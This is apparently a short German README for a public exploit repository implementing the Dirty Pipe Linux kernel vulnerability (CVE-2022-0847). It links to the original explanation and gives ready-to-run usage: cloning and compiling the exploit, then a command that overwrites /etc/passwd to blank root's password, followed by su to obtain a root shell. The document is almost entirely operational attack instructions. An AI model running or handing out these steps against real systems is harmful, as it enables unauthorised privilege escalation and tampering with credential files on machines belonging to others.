
Implementierung von Max Kellermanns Exploit für CVE-2022-0847
Dies ist lediglich der Code und die Anleitung zur Verwendung des Exploits von Max Kellermann für CVE-2022-0847 (bekannt als Dirty Pipe).
Bitte besuchen Sie https://dirtypipe.cm4all.com/ um mehr darüber zu erfahren, wie der Exploit funktioniert!
git clone https://github.com/0xIronGoat/dirty-pipe.git
cd dirty-pipe
gcc exploit.c -o exploit
./exploit /etc/passwd 1 "${$(cat /etc/passwd)/root:x/oot:}"
su
